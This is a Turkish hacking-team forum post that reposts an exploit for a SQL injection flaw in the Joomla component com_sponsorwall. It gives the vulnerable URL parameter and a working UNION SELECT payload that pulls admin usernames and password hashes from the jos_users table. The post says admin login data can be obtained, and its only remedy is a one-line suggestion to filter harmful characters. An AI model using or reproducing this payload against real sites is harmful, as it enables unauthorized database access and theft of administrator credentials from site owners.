UbeRbLow Hack Team

Üye Olmak İçin Tıklayınız !

 

Sitemiz Tekrar OnLine... Moderator AlımLar BaşLadı... BaşvuruLarınızı "Tim'e Başvuru" Bölümüne Yapınız. // Siray3t

    Joomla Sponsor Açığı

    Paylaş
    avatar
    Siray3t
     
     

    Cinsiyet : Erkek
    Mesaj Sayısı : 99
    Kayıt tarihi : 23/12/09
    Yaş : 23
    Nerden : İst
    İş/Hobiler : Bilgisayar
    Lakap : sec0rity

    Joomla Sponsor Açığı

    Mesaj tarafından Siray3t Bir Salı Kas. 30, 2010 2:20 pm

    Joomla Component com_sponsorwall SQL Injection Vulnerability

    ============================================================



    # Author : ridrick ~ Bug Researchers



    # Name : Joomla com_sponsorwall



    # Bug Type : SQL injection



    # Infection : Admin Login Bilgileri Alinabilir.



    # Demo Vuln :

    [+]index.php?option=com_sponsorwall&controller=sponsorwall&catid=[EXPLOIT]



    [+]Vendor:http://www.pulseextensions.com/



    # Note: AsDemo Sitede Filtre Var Haberiniz olsun Smile



    # Bug Fix Advice : Zararli Karakterler Filtrenmelidir.

    ######### ####################################################

    < ------------------- header data end of ------------------- >

    < -- bug code start -- >

    EXPLOIT :

    null+and+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,6,7,8,9,10+from+jos_users--

    < -- bug code end of -- >


    _________________

    UbeRbLow Hack Team | ekiN0x-aLLeqRo-aLkiNooS-KultAzaZeL

      Forum Saati Salı Ara. 11, 2018 9:38 am